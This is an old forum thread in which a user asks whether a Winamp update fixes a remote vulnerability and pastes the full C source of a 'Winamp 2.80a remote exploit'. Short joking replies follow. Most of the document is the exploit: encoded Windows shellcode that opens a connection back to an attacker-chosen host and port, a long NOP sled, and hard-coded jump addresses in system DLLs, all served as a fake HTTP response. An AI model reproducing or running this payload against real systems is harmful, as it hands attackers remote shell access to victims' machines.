XPLoiTS
 

I've heard about the bug in Nullsoft's Winamp's id3 Tag & about the way to xplote it remotely (wich is quite simple, I must Say) & also heard about another xploit (which I've yet not tested) that would allow any malicious a**hole access to my hard disk and so my files, only knowing my Internet Port Address and wether if I'm using Winamp 2.81 or earlier versions. In the demostrative picture that appeared on the web page (To which i wont give out free publicity) was the command.com prompt of Windoze 98 on suposely the attacker's PC (Runing Linux MDK 9), such as we see it on ours. This preocupates me 'cuz it's xtremely simple to gain full access wether the machine is protected or not 'cuz people like me WOULD leave CDDB and OF COURSE Minibrowser ports open on their firewalls, so winamp can connect. So my cuestion is: Does the newer version of Winamp 2.81 (tha one that fixes the id3 tag bug) fixes the bug that I've just described ??? If So, Please reply, If it doesn't, Please reply, If you've never heard about this exploit, Please reply and if you just want to tell me what a f*cker I am, Please reply :D

P.D.: Here is the source code of the xploit:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>

// a minimal HTTP header and fake version
unsigned char payload[35904] =
"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";

// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..

unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";

main(char argc, char **argv){
int i;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;

if (argc < 3){
printf("Winamp 2.80a remote exploit (7/3/2002)\n");
printf("c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com\n\n");
printf("usage: %s <localhost> <localport>\n\n", argv[0]);
printf("NOTE: target os is 2000.. probably works on all\n");
printf("winamp versions prior to 2.80a as there are no \n");
printf("dependancies on winamp, only the static ws2help\n\n");
exit(-1);
}

// blatantly ripped! *TEEHEEEHHEH*
a_port = htons(atoi(argv[2]));
a_port ^= 0x9595;
if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
a_host = *((unsigned long *)ht->h_addr);
a_host ^= 0x95959595;
shell[385] = ((a_port) & 0xff);
shell[386] = ((a_port >> 8) & 0xff);
shell[390] = ((a_host) & 0xff);
shell[391] = ((a_host >> 8) & 0xff);
shell[392] = ((a_host >> 16) & 0xff);
shell[393] = ((a_host >> 24) & 0xff);

strcat(payload, shell);

// lots of NOPs
for(i=792;i<9704;i++)
strcat(payload, "\x90");

// we land here when we jmp ebx the second time
// this sets ebx to the start of our shell, and jmps back
strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
strcat(payload, "\x11\x01\xff\xe3");

// lots more NOPs for lots more fun
for(i=9718;i<35809;i++)
strcat(payload, "\x90");

// and bh, dl; jmp ebx.. this allows us to jmp back into an area
// where we can put some real code
strcat(payload, "\x22\xfa\xff\xe3");

// our "eip" (call ecx; ntdll.dll@0x11936)
// jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)
strcat(payload, "\xd6\x19\x02\x75");

// if ws2help doesn't match for some reason, use this call ebx..
// dependant on the winamp in_wm.dll plugin
//strcat(payload, "\x57\x22\x12\x01");

strcat(payload, "\x0d\x0a");

printf("%s", payload);
}

And people say us trekers are sad

i believe that won't work in the new versions of winamp. i don't do a lot of C coding though, so i can't really analyse it. i assume it's a pretty basic "running arbitrary code" hack though.

i love exploit code. it's uber-l33t.

I have no clue what this is, or what it does, but as long as it doesn't do it anymore, I think that I am happy....

ze question: why escape everything?

so you can be freeeeee!

it's a good excuse to use drugs. :cool:

good point :winamp: